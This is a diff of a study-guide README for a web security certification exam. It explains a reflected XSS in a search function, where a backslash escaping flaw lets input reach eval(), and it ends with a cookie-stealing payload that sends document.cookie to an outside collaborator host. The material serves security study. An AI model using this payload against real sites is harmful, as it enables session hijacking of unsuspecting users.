botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 >In the **Search** function a Reflected XSS vulnerability is identified.
 The attacker then deliver an exploit link to victim with cookie stealing payload in a hosted **iframe** on their exploit server.

 >***Identify*** The search JavaScript code on the target, return a JSON response.
 Validate that the backslash **\\** escape is not sanitized, and the JSON data is then send to **eval()**.
-Backslash is not escaped correct and when the JSON response attempts to escape the opening double-quotes character, it adds a second backslash.
-The resulting double-backslash causes the escaping to be effectively canceled out.
+Backslash is not escaped correct and when the JSON response attempts to escape the opening double-quotes character, it adds a **second** backslash.
+The resulting double-backslash causes the escaping to be effectively cancelled out.

 ```JavaScript
 \"-fetch('https://Collaborator.com?cs='+btoa(document.cookie))}//